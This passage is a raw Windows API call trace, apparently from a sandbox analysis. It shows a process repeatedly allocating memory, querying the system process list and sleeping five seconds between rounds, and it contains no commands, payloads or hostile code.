NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.830] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.836] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.842] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.845] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.849] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.855] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.856] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.862] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.863] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.865] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.870] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.887] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.894] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.896] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.901] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.916] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.923] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.931] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.938] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.952] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.959] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0208.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0208.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0208.973] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0208.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0208.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0208.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0208.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, 